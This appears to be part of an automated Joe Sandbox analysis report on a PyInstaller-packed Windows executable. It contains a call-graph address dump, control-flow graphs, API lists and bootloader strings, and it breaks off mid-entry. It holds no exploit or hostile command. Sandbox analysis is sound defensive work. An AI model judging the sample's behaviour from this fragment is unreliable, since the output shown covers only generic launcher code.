18005->17861 18007 7ff7ff587cf5 18006->18007 18008 7ff7ff5845b0 108 API calls 18007->18008 18009 7ff7ff587d1b 18008->18009 18010 7ff7ff5845b0 108 API calls 18009->18010 18024 7ff7ff587d42 18009->18024 18011 7ff7ff587d32 18010->18011 18013 7ff7ff587d3d 18011->18013 18014 7ff7ff587d4c 18011->18014 18012 7ff7ff58c5c0 _log10_special 8 API calls 18015 7ff7ff584267 18012->18015 18016 7ff7ff5900bc 74 API calls 18013->18016 18036 7ff7ff590154 18014->18036 18015->17868 18015->17871 18016->18024 18018 7ff7ff587daf 18019 7ff7ff5900bc 74 API calls 18018->18019 18020 7ff7ff587dd7 18019->18020 18022 7ff7ff5900bc 74 API calls 18020->18022 18021 7ff7ff59040c _fread_nolock 53 API calls 18030 7ff7ff587d51 18021->18030 18022->18024 18023 7ff7ff587db6 18026 7ff7ff590180 37 API calls 18023->18026 18024->18012 18025 7ff7ff590b4c 76 API calls 18025->18030 18027 7ff7ff587db1 18026->18027 18027->18018 18042 7ff7ff597388 18027->18042 18028 7ff7ff590180 37 API calls 18028->18030 18030->18018 18030->18021 18030->18023 18030->18025 18030->18027 18030->18028 18031 7ff7ff590154 37 API calls 18030->18031 18031->18030 18034 7ff7ff5818d5 18032->18034 18035 7ff7ff581865 18032->18035 18033 7ff7ff595094 45 API calls 18033->18035 18034->17889 18034->17890 18035->18033 18035->18034 18037 7ff7ff59016d 18036->18037 18038 7ff7ff59015d 18036->18038 18037->18030 18039 7ff7ff594f78 _set_fmode 11 API calls 18038->18039 18040 7ff7ff590162 18039->18040 18041 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 18040->18041 18041->18037 18043 7ff7ff597390 18042->18043 18044 7ff7ff5973ac 18043->18044 18045 7ff7ff5973cd 18043->18045 18046 7ff7ff594f78 _set_fmode 11 API calls 18044->18046 18061 7ff7ff5954dc EnterCriticalSection 18045->18061 18063 7ff7ff595f38 18062->18063 18064 7ff7ff595f5e 18063->18064 18066 7ff7ff595f91 18063->18066 18065 7ff7ff594f78 _set_fmode 11 API calls 18064->18065 18067 7ff7ff595f63 18065->18067 18068 7ff7ff595fa4 18066->18068 18069 7ff7ff595f97 18066->18069 18070 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 18067->18070 18081 7ff7ff59ac98 18068->18081 18071 7ff7ff594f78 _set_fmode 11 API calls 18069->18071 18080 7ff7ff584606 18070->18080 18071->18080 18080->16802 18094 7ff7ff5a0348 EnterCriticalSection 18081->18094 18455 7ff7ff597968 18454->18455 18458 7ff7ff597444 18455->18458 18457 7ff7ff597981 18457->16812 18459 7ff7ff59745f 18458->18459 18460 7ff7ff59748e 18458->18460 18462 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 18459->18462 18468 7ff7ff5954dc EnterCriticalSection 18460->18468 18463 7ff7ff59747f 18462->18463 18463->18457 18470 7ff7ff58fee1 18469->18470 18471 7ff7ff58feb3 18469->18471 18478 7ff7ff58fed3 18470->18478 18479 7ff7ff5954dc EnterCriticalSection 18470->18479 18472 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 18471->18472 18472->18478 18478->16816 18481 7ff7ff5845b0 108 API calls 18480->18481 18482 7ff7ff581493 18481->18482 18483 7ff7ff5814bc 18482->18483 18484 7ff7ff58149b 18482->18484 18486 7ff7ff590744 73 API calls 18483->18486 18485 7ff7ff582710 54 API calls 18484->18485 18488 7ff7ff5814ab 18485->18488 18487 7ff7ff5814d1 18486->18487 18489 7ff7ff5814f8 18487->18489 18490 7ff7ff5814d5 18487->18490 18488->16849 18494 7ff7ff581508 18489->18494 18495 7ff7ff581532 18489->18495 18491 7ff7ff594f78 _set_fmode 11 API calls 18490->18491 18492 7ff7ff5814da 18491->18492 18493 7ff7ff582910 54 API calls 18492->18493 18500 7ff7ff5814f3 __std_exception_destroy 18493->18500 18496 7ff7ff594f78 _set_fmode 11 API calls 18494->18496 18497 7ff7ff581538 18495->18497 18505 7ff7ff58154b 18495->18505 18499 7ff7ff581510 18496->18499 18498 7ff7ff581210 92 API calls 18497->18498 18498->18500 18501 7ff7ff582910 54 API calls 18499->18501 18502 7ff7ff5900bc 74 API calls 18500->18502 18501->18500 18503 7ff7ff5815c4 18502->18503 18503->16849 18504 7ff7ff59040c _fread_nolock 53 API calls 18504->18505 18505->18500 18505->18504 18506 7ff7ff5815d6 18505->18506 18507 7ff7ff594f78 _set_fmode 11 API calls 18506->18507 18508 7ff7ff5815db 18507->18508 18509 7ff7ff582910 54 API calls 18508->18509 18509->18500 18511 7ff7ff589400 2 API calls 18510->18511 18512 7ff7ff589084 LoadLibraryExW 18511->18512 18513 7ff7ff5890a3 __std_exception_destroy 18512->18513 18513->16883 18515 7ff7ff58770b GetProcAddress 18514->18515 18516 7ff7ff5876d9 GetLastError 18514->18516 18587 7ff7ff586365 18586->18587 18588 7ff7ff581c80 49 API calls 18587->18588 18589 7ff7ff5863a1 18588->18589 18590 7ff7ff5863cd 18589->18590 18591 7ff7ff5863aa 18589->18591 18593 7ff7ff584620 49 API calls 18590->18593 18592 7ff7ff582710 54 API calls 18591->18592 18609 7ff7ff5863c3 18592->18609 18594 7ff7ff5863e5 18593->18594 18595 7ff7ff586403 18594->18595 18598 7ff7ff582710 54 API calls 18594->18598 18596 7ff7ff584550 10 API calls 18595->18596 18601 7ff7ff58640d 18596->18601 18597 7ff7ff58c5c0 _log10_special 8 API calls 18599 7ff7ff58336e 18597->18599 18598->18595 18599->16923 18617 7ff7ff5864f0 18599->18617 18600 7ff7ff58641b 18603 7ff7ff584620 49 API calls 18600->18603 18601->18600 18602 7ff7ff589070 3 API calls 18601->18602 18602->18600 18604 7ff7ff586434 18603->18604 18605 7ff7ff586459 18604->18605 18606 7ff7ff586439 18604->18606 18608 7ff7ff589070 3 API calls 18605->18608 18607 7ff7ff582710 54 API calls 18606->18607 18607->18609 18610 7ff7ff586466 18608->18610 18609->18597 18611 7ff7ff586472 18610->18611 18612 7ff7ff5864b1 18610->18612 18614 7ff7ff589400 2 API calls 18611->18614 18676 7ff7ff585820 GetProcAddress 18612->18676 18615 7ff7ff58648a GetLastError 18614->18615 18616 7ff7ff582c50 51 API calls 18615->18616 18616->18609 18766 7ff7ff5853f0 18617->18766 18619 7ff7ff586516 18620 7ff7ff58651e 18619->18620 18621 7ff7ff58652f 18619->18621 18622 7ff7ff582710 54 API calls 18620->18622 18773 7ff7ff584c80 18621->18773 18628 7ff7ff58652a 18622->18628 18625 7ff7ff58654c 18629 7ff7ff58655c 18625->18629 18631 7ff7ff58656d 18625->18631 18626 7ff7ff58653b 18627 7ff7ff582710 54 API calls 18626->18627 18627->18628 18628->16919 18630 7ff7ff582710 54 API calls 18629->18630 18630->18628 18632 7ff7ff58658c 18631->18632 18634 7ff7ff58659d 18631->18634 18633 7ff7ff582710 54 API calls 18632->18633 18633->18628 18635 7ff7ff5865bd 18634->18635 18636 7ff7ff5865ac 18634->18636 18777 7ff7ff584d40 18635->18777 18637 7ff7ff582710 54 API calls 18636->18637 18637->18628 18655 7ff7ff586060 18654->18655 18655->18655 18656 7ff7ff586089 18655->18656 18662 7ff7ff5860a0 __std_exception_destroy 18655->18662 18657 7ff7ff582710 54 API calls 18656->18657 18658 7ff7ff586095 18657->18658 18658->16921 18659 7ff7ff5861ab 18659->16921 18660 7ff7ff581470 116 API calls 18660->18662 18661 7ff7ff582710 54 API calls 18661->18662 18662->18659 18662->18660 18662->18661 18664 7ff7ff586225 18663->18664 18667 7ff7ff5861fc 18663->18667 18665 7ff7ff582710 54 API calls 18664->18665 18667->18664 18677 7ff7ff585842 GetLastError 18676->18677 18678 7ff7ff58586f GetProcAddress 18676->18678 18681 7ff7ff58584f 18677->18681 18679 7ff7ff58588b GetLastError 18678->18679 18680 7ff7ff58589a GetProcAddress 18678->18680 18679->18681 18682 7ff7ff5858b6 GetLastError 18680->18682 18683 7ff7ff5858c5 GetProcAddress 18680->18683 18684 7ff7ff582c50 51 API calls 18681->18684 18682->18681 18686 7ff7ff5858f3 GetProcAddress 18683->18686 18687 7ff7ff5858e1 GetLastError 18683->18687 18685 7ff7ff585864 18684->18685 18685->18609 18688 7ff7ff585921 GetProcAddress 18686->18688 18689 7ff7ff58590f GetLastError 18686->18689 18687->18681 18690 7ff7ff58593d GetLastError 18688->18690 18691 7ff7ff58594f GetProcAddress 18688->18691 18689->18681 18690->18681 18692 7ff7ff58597d GetProcAddress 18691->18692 18693 7ff7ff58596b GetLastError 18691->18693 18694 7ff7ff5859ab GetProcAddress 18692->18694 18695 7ff7ff585999 GetLastError 18692->18695 18693->18692 18695->18694 18768 7ff7ff58541c 18766->18768 18767 7ff7ff585424 18767->18619 18768->18767 18771 7ff7ff5855c4 18768->18771 18797 7ff7ff596b14 18768->18797 18769 7ff7ff585787 __std_exception_destroy 18769->18619 18770 7ff7ff5847c0 47 API calls 18770->18771 18771->18769 18771->18770 18774 7ff7ff584cb0 18773->18774 18775 7ff7ff58c5c0 _log10_special 8 API calls 18774->18775 18776 7ff7ff584d1a 18775->18776 18776->18625 18776->18626 18778 7ff7ff584d55 18777->18778 18798 7ff7ff596b44 18797->18798 18801 7ff7ff596010 18798->18801 18800 7ff7ff596b74 18800->18768 18802 7ff7ff596041 18801->18802 18803 7ff7ff596053 18801->18803 18805 7ff7ff594f78 _set_fmode 11 API calls 18802->18805 18804 7ff7ff59609d 18803->18804 18806 7ff7ff596060 18803->18806 18807 7ff7ff5960b8 18804->18807 18810 7ff7ff594830 45 API calls 18804->18810 18808 7ff7ff596046 18805->18808 18809 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 18806->18809 18815 7ff7ff5960da 18807->18815 18822 7ff7ff596a9c 18807->18822 18812 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 18808->18812 18814 7ff7ff596051 18809->18814 18810->18807 18812->18814 18813 7ff7ff59617b 18813->18814 18816 7ff7ff594f78 _set_fmode 11 API calls 18813->18816 18814->18800 18815->18813 18817 7ff7ff594f78 _set_fmode 11 API calls 18815->18817 18818 7ff7ff596226 18816->18818 18819 7ff7ff596170 18817->18819 18820 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 18818->18820 18821 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 18819->18821 18820->18814 18821->18813 18823 7ff7ff596abf 18822->18823 18824 7ff7ff596ad6 18822->18824 18828 7ff7ff59ffd8 18823->18828 18826 7ff7ff596ac4 18824->18826 18833 7ff7ff5a0008 18824->18833 18826->18807 18829 7ff7ff59b1c0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18828->18829 18830 7ff7ff59ffe1 18829->18830 18831 7ff7ff59d9f4 45 API calls 18830->18831 18832 7ff7ff59fffa 18831->18832 18832->18826 18834 7ff7ff594fbc 45 API calls 18833->18834 18835 7ff7ff5a0041 18834->18835 18839 7ff7ff5a004d 18835->18839 18840 7ff7ff5a2eb0 18835->18840 18837 7ff7ff58c5c0 _log10_special 8 API calls 18839->18837 18841 7ff7ff594fbc 45 API calls 18840->18841 18874->16927

                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                      Function 00007FF7FF588BD0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 0 7ff7ff588bd0-7ff7ff588d16 call 7ff7ff58c8c0 call 7ff7ff589400 SetConsoleCtrlHandler GetStartupInfoW call 7ff7ff595460 call 7ff7ff59a4ec call 7ff7ff59878c call 7ff7ff595460 call 7ff7ff59a4ec call 7ff7ff59878c call 7ff7ff595460 call 7ff7ff59a4ec call 7ff7ff59878c GetCommandLineW CreateProcessW 23 7ff7ff588d18-7ff7ff588d38 GetLastError call 7ff7ff582c50 0->23 24 7ff7ff588d3d-7ff7ff588d79 RegisterClassW 0->24 31 7ff7ff589029-7ff7ff58904f call 7ff7ff58c5c0 23->31 26 7ff7ff588d81-7ff7ff588dd5 CreateWindowExW 24->26 27 7ff7ff588d7b GetLastError 24->27 29 7ff7ff588ddf-7ff7ff588de4 ShowWindow 26->29 30 7ff7ff588dd7-7ff7ff588ddd GetLastError 26->30 27->26 32 7ff7ff588dea-7ff7ff588dfa WaitForSingleObject 29->32 30->32 34 7ff7ff588e78-7ff7ff588e7f 32->34 35 7ff7ff588dfc 32->35 36 7ff7ff588e81-7ff7ff588e91 WaitForSingleObject 34->36 37 7ff7ff588ec2-7ff7ff588ec9 34->37 39 7ff7ff588e00-7ff7ff588e03 35->39 40 7ff7ff588e97-7ff7ff588ea7 TerminateProcess 36->40 41 7ff7ff588fe8-7ff7ff588ff2 36->41 42 7ff7ff588ecf-7ff7ff588ee5 QueryPerformanceFrequency QueryPerformanceCounter 37->42 43 7ff7ff588fb0-7ff7ff588fc9 GetMessageW 37->43 44 7ff7ff588e05 GetLastError 39->44 45 7ff7ff588e0b-7ff7ff588e12 39->45 48 7ff7ff588eaf-7ff7ff588ebd WaitForSingleObject 40->48 49 7ff7ff588ea9 GetLastError 40->49 46 7ff7ff589001-7ff7ff589025 GetExitCodeProcess CloseHandle * 2 41->46 47 7ff7ff588ff4-7ff7ff588ffa DestroyWindow 41->47 50 7ff7ff588ef0-7ff7ff588f28 MsgWaitForMultipleObjects PeekMessageW 42->50 52 7ff7ff588fdf-7ff7ff588fe6 43->52 53 7ff7ff588fcb-7ff7ff588fd9 TranslateMessage DispatchMessageW 43->53 44->45 45->36 51 7ff7ff588e14-7ff7ff588e31 PeekMessageW 45->51 46->31 47->46 48->41 49->48 54 7ff7ff588f63-7ff7ff588f6a 50->54 55 7ff7ff588f2a 50->55 56 7ff7ff588e33-7ff7ff588e64 TranslateMessage DispatchMessageW PeekMessageW 51->56 57 7ff7ff588e66-7ff7ff588e76 WaitForSingleObject 51->57 52->41 52->43 53->52 54->43 59 7ff7ff588f6c-7ff7ff588f95 QueryPerformanceCounter 54->59 58 7ff7ff588f30-7ff7ff588f61 TranslateMessage DispatchMessageW PeekMessageW 55->58 56->56 56->57 57->34 57->39 58->54 58->58 59->50 60 7ff7ff588f9b-7ff7ff588fa2 59->60 60->41 61 7ff7ff588fa4-7ff7ff588fa8 60->61 61->43
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                      • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                      • API String ID: 3832162212-3165540532
                                                                                                                                                                                                      • Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                      • Instruction ID: bb1e8f7c11fd39835bd5c9ebc188d4382c84938100bf41fe2b99b186b4af867f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98D15D32A09AC296EB10AF74E8542E9B760FB84B58F800335DA7D47AE4DF3CD555C7A0
                                                                                                                                                                                                      Function 00007FF7FF581000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 509COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 62 7ff7ff581000-7ff7ff583806 call 7ff7ff58fe88 call 7ff7ff58fe90 call 7ff7ff58c8c0 call 7ff7ff595460 call 7ff7ff5954f4 call 7ff7ff5836b0 76 7ff7ff583808-7ff7ff58380f 62->76 77 7ff7ff583814-7ff7ff583836 call 7ff7ff581950 62->77 78 7ff7ff583c97-7ff7ff583cb2 call 7ff7ff58c5c0 76->78 83 7ff7ff58383c-7ff7ff583856 call 7ff7ff581c80 77->83 84 7ff7ff58391b-7ff7ff583931 call 7ff7ff5845b0 77->84 88 7ff7ff58385b-7ff7ff58389b call 7ff7ff588a20 83->88 89 7ff7ff58396a-7ff7ff58397f call 7ff7ff582710 84->89 90 7ff7ff583933-7ff7ff583960 call 7ff7ff587f80 84->90 97 7ff7ff58389d-7ff7ff5838a3 88->97 98 7ff7ff5838c1-7ff7ff5838cc call 7ff7ff594fa0 88->98 102 7ff7ff583c8f 89->102 100 7ff7ff583984-7ff7ff5839a6 call 7ff7ff581c80 90->100 101 7ff7ff583962-7ff7ff583965 call 7ff7ff5900bc 90->101 103 7ff7ff5838a5-7ff7ff5838ad 97->103 104 7ff7ff5838af-7ff7ff5838bd call 7ff7ff588b90 97->104 110 7ff7ff5839fc-7ff7ff583a2a call 7ff7ff588b30 call 7ff7ff588b90 * 3 98->110 111 7ff7ff5838d2-7ff7ff5838e1 call 7ff7ff588a20 98->111 115 7ff7ff5839b0-7ff7ff5839b9 100->115 101->89 102->78 103->104 104->98 138 7ff7ff583a2f-7ff7ff583a3e call 7ff7ff588a20 110->138 120 7ff7ff5838e7-7ff7ff5838ed 111->120 121 7ff7ff5839f4-7ff7ff5839f7 call 7ff7ff594fa0 111->121 115->115 118 7ff7ff5839bb-7ff7ff5839d8 call 7ff7ff581950 115->118 118->88 127 7ff7ff5839de-7ff7ff5839ef call 7ff7ff582710 118->127 125 7ff7ff5838f0-7ff7ff5838fc 120->125 121->110 128 7ff7ff5838fe-7ff7ff583903 125->128 129 7ff7ff583905-7ff7ff583908 125->129 127->102 128->125 128->129 129->121 132 7ff7ff58390e-7ff7ff583916 call 7ff7ff594fa0 129->132 132->138 141 7ff7ff583b45-7ff7ff583b53 138->141 142 7ff7ff583a44-7ff7ff583a47 138->142 144 7ff7ff583b59-7ff7ff583b5d 141->144 145 7ff7ff583a67 141->145 142->141 143 7ff7ff583a4d-7ff7ff583a50 142->143 146 7ff7ff583a56-7ff7ff583a5a 143->146 147 7ff7ff583b14-7ff7ff583b17 143->147 148 7ff7ff583a6b-7ff7ff583a90 call 7ff7ff594fa0 144->148 145->148 146->147 149 7ff7ff583a60 146->149 150 7ff7ff583b19-7ff7ff583b1d 147->150 151 7ff7ff583b2f-7ff7ff583b40 call 7ff7ff582710 147->151 157 7ff7ff583aab-7ff7ff583ac0 148->157 158 7ff7ff583a92-7ff7ff583aa6 call 7ff7ff588b30 148->158 149->145 150->151 153 7ff7ff583b1f-7ff7ff583b2a 150->153 159 7ff7ff583c7f-7ff7ff583c87 151->159 153->148 161 7ff7ff583be8-7ff7ff583bfa call 7ff7ff588a20 157->161 162 7ff7ff583ac6-7ff7ff583aca 157->162 158->157 159->102 171 7ff7ff583c2e 161->171 172 7ff7ff583bfc-7ff7ff583c02 161->172 164 7ff7ff583bcd-7ff7ff583be2 call 7ff7ff581940 162->164 165 7ff7ff583ad0-7ff7ff583ae8 call 7ff7ff5952c0 162->165 164->161 164->162 175 7ff7ff583aea-7ff7ff583b02 call 7ff7ff5952c0 165->175 176 7ff7ff583b62-7ff7ff583b7a call 7ff7ff5952c0 165->176 177 7ff7ff583c31-7ff7ff583c40 call 7ff7ff594fa0 171->177 173 7ff7ff583c1e-7ff7ff583c2c 172->173 174 7ff7ff583c04-7ff7ff583c1c 172->174 173->177 174->177 175->164 186 7ff7ff583b08-7ff7ff583b0f 175->186 184 7ff7ff583b7c-7ff7ff583b80 176->184 185 7ff7ff583b87-7ff7ff583b9f call 7ff7ff5952c0 176->185 187 7ff7ff583c46-7ff7ff583c4a 177->187 188 7ff7ff583d41-7ff7ff583d63 call 7ff7ff5844d0 177->188 184->185 197 7ff7ff583bac-7ff7ff583bc4 call 7ff7ff5952c0 185->197 198 7ff7ff583ba1-7ff7ff583ba5 185->198 186->164 190 7ff7ff583cd4-7ff7ff583ce6 call 7ff7ff588a20 187->190 191 7ff7ff583c50-7ff7ff583c5f call 7ff7ff5890e0 187->191 201 7ff7ff583d65-7ff7ff583d6f call 7ff7ff584620 188->201 202 7ff7ff583d71-7ff7ff583d82 call 7ff7ff581c80 188->202 206 7ff7ff583ce8-7ff7ff583ceb 190->206 207 7ff7ff583d35-7ff7ff583d3c 190->207 204 7ff7ff583cb3-7ff7ff583cb6 call 7ff7ff588850 191->204 205 7ff7ff583c61 191->205 197->164 219 7ff7ff583bc6 197->219 198->197 210 7ff7ff583d87-7ff7ff583d96 201->210 202->210 218 7ff7ff583cbb-7ff7ff583cbd 204->218 213 7ff7ff583c68 call 7ff7ff582710 205->213 206->207 214 7ff7ff583ced-7ff7ff583d10 call 7ff7ff581c80 206->214 207->213 216 7ff7ff583d98-7ff7ff583d9f 210->216 217 7ff7ff583dc4-7ff7ff583dda call 7ff7ff589400 210->217 226 7ff7ff583c6d-7ff7ff583c77 213->226 230 7ff7ff583d2b-7ff7ff583d33 call 7ff7ff594fa0 214->230 231 7ff7ff583d12-7ff7ff583d26 call 7ff7ff582710 call 7ff7ff594fa0 214->231 216->217 222 7ff7ff583da1-7ff7ff583da5 216->222 234 7ff7ff583ddc 217->234 235 7ff7ff583de8-7ff7ff583e04 SetDllDirectoryW 217->235 224 7ff7ff583cc8-7ff7ff583ccf 218->224 225 7ff7ff583cbf-7ff7ff583cc6 218->225 219->164 222->217 228 7ff7ff583da7-7ff7ff583dbe SetDllDirectoryW LoadLibraryExW 222->228 224->210 225->213 226->159 228->217 230->210 231->226 234->235 238 7ff7ff583e0a-7ff7ff583e19 call 7ff7ff588a20 235->238 239 7ff7ff583f01-7ff7ff583f08 235->239 251 7ff7ff583e1b-7ff7ff583e21 238->251 252 7ff7ff583e32-7ff7ff583e3c call 7ff7ff594fa0 238->252 241 7ff7ff583f0e-7ff7ff583f15 239->241 242 7ff7ff583ffc-7ff7ff584004 239->242 241->242 245 7ff7ff583f1b-7ff7ff583f25 call 7ff7ff5833c0 241->245 246 7ff7ff584029-7ff7ff58405b call 7ff7ff5836a0 call 7ff7ff583360 call 7ff7ff583670 call 7ff7ff586fb0 call 7ff7ff586d60 242->246 247 7ff7ff584006-7ff7ff584023 PostMessageW GetMessageW 242->247 245->226 259 7ff7ff583f2b-7ff7ff583f3f call 7ff7ff5890c0 245->259 247->246 256 7ff7ff583e2d-7ff7ff583e2f 251->256 257 7ff7ff583e23-7ff7ff583e2b 251->257 261 7ff7ff583ef2-7ff7ff583efc call 7ff7ff588b30 252->261 262 7ff7ff583e42-7ff7ff583e48 252->262 256->252 257->256 271 7ff7ff583f64-7ff7ff583fa0 call 7ff7ff588b30 call 7ff7ff588bd0 call 7ff7ff586fb0 call 7ff7ff586d60 call 7ff7ff588ad0 259->271 272 7ff7ff583f41-7ff7ff583f5e PostMessageW GetMessageW 259->272 261->239 262->261 266 7ff7ff583e4e-7ff7ff583e54 262->266 269 7ff7ff583e56-7ff7ff583e58 266->269 270 7ff7ff583e5f-7ff7ff583e61 266->270 274 7ff7ff583e5a 269->274 275 7ff7ff583e67-7ff7ff583e83 call 7ff7ff586db0 call 7ff7ff587330 269->275 270->239 270->275 307 7ff7ff583fa5-7ff7ff583fa7 271->307 272->271 274->239 290 7ff7ff583e8e-7ff7ff583e95 275->290 291 7ff7ff583e85-7ff7ff583e8c 275->291 294 7ff7ff583e97-7ff7ff583ea4 call 7ff7ff586df0 290->294 295 7ff7ff583eaf-7ff7ff583eb9 call 7ff7ff5871a0 290->295 293 7ff7ff583edb-7ff7ff583ef0 call 7ff7ff582a50 call 7ff7ff586fb0 call 7ff7ff586d60 291->293 293->239 294->295 304 7ff7ff583ea6-7ff7ff583ead 294->304 305 7ff7ff583ebb-7ff7ff583ec2 295->305 306 7ff7ff583ec4-7ff7ff583ed2 call 7ff7ff5874e0 295->306 304->293 305->293 306->239 319 7ff7ff583ed4 306->319 310 7ff7ff583fe9-7ff7ff583ff7 call 7ff7ff581900 307->310 311 7ff7ff583fa9-7ff7ff583fb3 call 7ff7ff589200 307->311 310->226 311->310 321 7ff7ff583fb5-7ff7ff583fca 311->321 319->293 322 7ff7ff583fcc-7ff7ff583fdf call 7ff7ff582710 call 7ff7ff581900 321->322 323 7ff7ff583fe4 call 7ff7ff582a50 321->323 322->226 323->310
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                      • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
                                                                                                                                                                                                      • API String ID: 2776309574-4232158417
                                                                                                                                                                                                      • Opcode ID: f4bde723f435afbc19067a7a24fd6b211f61cdc128d128b32e21301cfb995a7e
                                                                                                                                                                                                      • Instruction ID: 57a01c2ceafa3121435a7f2d813a76db16d70b1190a458cf91c2cf10d2ca6edc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f4bde723f435afbc19067a7a24fd6b211f61cdc128d128b32e21301cfb995a7e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90328D21A0D6C291FB29BB25D4542F9E691BF45780FC84232DA7E432D6EF2CE565C3E0
                                                                                                                                                                                                      Function 00007FF7FF5A69D4 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
